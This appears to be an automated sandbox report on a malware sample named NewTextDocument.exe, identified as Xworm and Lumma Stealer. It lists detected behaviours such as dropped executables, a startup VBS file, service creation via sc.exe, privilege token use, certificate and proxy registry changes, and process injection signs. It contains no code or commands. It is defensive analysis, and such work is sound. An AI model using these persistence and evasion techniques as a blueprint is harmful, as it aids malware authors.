Analysis Overview
SHA256: 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
Threat Level: Known bad
The file NewTextDocument.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Lumma Stealer, LummaC
Lumma family
Xworm
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm family
Creates new service(s)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Drops startup file
Power Settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported: 2025-06-05 19:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2025-06-05 19:12
Reported: 2025-06-05 19:15
Platform: win10v2004-20250502-en
Max time kernel: 150s
Max time network: 149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2344 created 608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 6084 created 608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelName.vbs | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
Power Settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\dialer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 05 Jun 2025 19:14:42 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
